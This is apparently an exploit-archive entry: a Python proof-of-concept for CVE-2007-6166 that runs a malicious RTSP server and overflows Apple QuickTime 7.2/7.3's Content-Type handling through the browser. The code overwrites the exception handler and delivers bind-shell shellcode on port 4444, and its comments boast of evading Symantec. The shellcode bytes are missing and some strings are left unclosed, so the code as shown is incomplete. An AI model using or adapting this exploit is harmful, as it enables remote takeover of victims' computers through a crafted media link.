Apple QuickTime 7.2/7.3 (Internet Explorer 7 / Firefox / Opera) - RTSP Response Universal

Related Vulnerabilities: CVE-2007-6166  
Publish Date: 26 Nov 2007
Author: muts
# Bug discovered by Krystian Kloskowski (h07) <>
# Tested on: Apple QuickTime Player 7.3 / 7.2 IE7,FF /Opera, XP SP2, Vista
# This exploit is completely "Universal" .... It has also been modded to work via url redirection ...  
# Magic RETs work on 7.3,7.2,XPSP2,Vista,IE7,Firefox,Opera....
# re-edited by muts and javaguru1999 to annoy Symantec
# there IS NO SPOON!
# "With Internet Explorer versions 6 and 7, and the Safari 3 beta,  
# the attack appears to be prevented because standard buffer overflow  
# prevention processes act before any damage can be done, Florio wrote.  
# With Firefox, the QuickTime RTSP response is unmoderated. As a result,  
# the exploit works against Firefox if QuickTime is the default multimedia player,  
# according to Florio."
# Calling Quicktime via URL kicks in an Extra Exception Handler,  
# of which we have no control over.
# By making the buffer larger than the original exploit, we can overwrite  
# the last exception handler, and regain control over execution.
# This is indeed an evil exploit - muhaha.
from socket import *
header = (
'RTSP/1.0 200 OK\r\n'
'CSeq: 1\r\n'
'Date: 0x00 :P\r\n'
'Content-Base: rtsp://\r\n'
'Content-Type: %s\r\n' # <-- overflow
'Content-Length: %d\r\n'
body = (
'o=- 16689332712 1 IN IP4\r\n'
's=MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n'
't=0 0\r\n'
'a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n'
'm=audio 0 RTP/AVP 14\r\n'
'c=IN IP4\r\n'
# ExitProcess shellcode will kill browser, but keep the shell open
shellcode =(# win32_bind -  EXITFUNC=process LPORT=4444 Size=696 Encoder=Alpha2 */
tmp = "A" * 987
tmp +="\xeb\x20\x90\x90"  # short jump for 7.2
tmp +="\xeb\x20\x9c\x66"  # 669c20eb | funky magic - pop pop ret for 7.2 / short jump for 7.3
tmp +="\x4e\x28\x86\x66"  # 6686284e | pop pop ret for 7.3
tmp += "\x90" * 92
tmp += shellcode
tmp += "\x41" * int(30000-len(shellcode))    # play with this buffer if you still get exceptions.  
header %= (tmp, len(body))
evil = header + body
s = socket(AF_INET, SOCK_STREAM)
s.bind(("", 554))
print "[+] Listening on [RTSP] 554"
c, addr = s.accept()
print "[+] Connection accepted from: %s" % (addr[0])
raw_input("[+] Done, press enter to quit")

# [2007-11-26]